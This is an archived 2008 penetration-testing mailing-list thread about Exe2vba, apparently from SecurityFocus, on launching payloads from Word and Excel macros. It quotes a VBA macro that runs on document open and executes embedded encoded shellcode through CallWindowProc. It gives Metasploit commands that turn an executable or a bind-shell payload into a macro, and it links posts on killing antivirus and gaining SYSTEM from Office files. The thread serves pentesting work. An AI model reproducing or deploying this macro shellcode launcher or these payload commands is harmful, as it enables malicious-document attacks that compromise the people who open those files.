Penetration Testing mailing list archives
RE: Exe2vba - Anybody still have this?
From: "Brett Moore" <brett.moore () insomniasec com>
Date: Tue, 18 Nov 2008 15:28:39 +1300
A paper that has some interesting concepts yet I think went under the radar of most people. http://www.milw0rm.com/papers/185 I have used the concept as a .aspx shellcode launcher, but I haven't tested the VBA example given. --------------- Naturally, another vector is VBA macros. Most user set protection against macro execution on medium, so you'll easily write a code like this: Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long Private Sub Document_Open() On Error GoTo hell For i = 1 To 12 nop = nop & Chr(144) Next i shellcode = nop & "ëıYëıèøÿÿÿOIIIIIIQZVTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0" & _ "ADTBDQB0ADAVX4Z8BDJOMNOJNF4BPB0BPK8EDNCK8NGE0JGA0ONKH" & _ "OTJAK8OUBRA0KNITKHF3KHAPPNACBLIYNJFHBLFGGPALLLMPAPDLK" & _ "NFOKCF5FRF0E7ENKXOEFBAPKNHFKHN0KDKHO5NAA0KNK8NQK8APKN" & _ "I8NEF2FPCLA3BLFFKHB4B3E8BLJGN0K8B4NPKXBGNAMJKXJ6J0KNI" & _ "PKHBHBKB0BPB0K8JVNCOUA3HOBFH5I8JOCXBLK7BUJ6BOLXFPO5J6" & _ "JYPOL8PPGUOOGNCVAVNFCVP2EFJ7E6BPZ" & nop TextBox1.Text = shellcode CallWindowProc 2089148898, 1, TextBox1.Text, ByVal 0&, ByVal 0& '2089148898 = 0x7C85E1E2 CALL [EBP+1C] from kernel32.dll Exit Sub hell: MsgBox "There was something wrong..." & vbCrLf & _ "Error number: " & Err.Number & vbCrLf & _ "Error description: " & Err.Description End Sub -------------------- Removes the requirement for a writeable/executable location etc. Brett -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of natron Sent: Monday, 17 November 2008 3:50 p.m. To: H D Moore; pen-test () securityfocus com; Joseph McCray Subject: Re: Exe2vba - Anybody still have this? I wrote up a quick series of posts on how to use VBA to do all kinds of things, as long as the user running the Excel/Word file has the necessary rights. If anyone would find them useful: Running commands or launching programs: http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents. html Downloading files and saving them to disk: http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html Running commands as SYSTEM: http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba -in.html Killing off any antivirus that may be running: http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or. html Modifying the Windows Firewall: http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-fr om.html What I would really love to see would be a combination of the Churrasco exploit (http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.ht ml) into VBA, so that even if the user is running in a limited account, they'd be able to gain SYSTEM privileges. -n On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist () digitaloffense net> wrote:
Hi Joseph, I added this to Metasploit. You can use the VBA generator in a few different ways: 1) Convert an EXE to a VBA script (works on Word/Excel automatically): $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba 2) Create a VBA script that runs a Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba 3) Create a VBA script that runs an encoded Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \ ruby msf3/msfencode -a x86 -b '' -t vba > output.vba To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-) You need the latest SVN of Metasploit 3.2 trunk: $ svn co http://metasploit.com/svn/framework3/trunk/ On Windows, follow this guide: - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN -HD On Tuesday 11 November 2008, Joseph McCray wrote:It used to be located at: http://www.priestmaster.org/tools.html I've been looking all over the web and really haven't been able to find this app anymore.------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------ ------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
Current thread:
- Exe2vba - Anybody still have this? Joseph McCray (Nov 11)
- Re: Exe2vba - Anybody still have this? Lucas Lyon (Nov 12)
- Re: Exe2vba - Anybody still have this? H D Moore (Nov 12)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- RE: Exe2vba - Anybody still have this? Brett Moore (Nov 17)
- Re: Exe2vba - Anybody still have this? Ulisses Castro (thebug) (Nov 17)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- <Possible follow-ups>
- Re: Exe2vba - Anybody still have this? infolookup (Nov 12)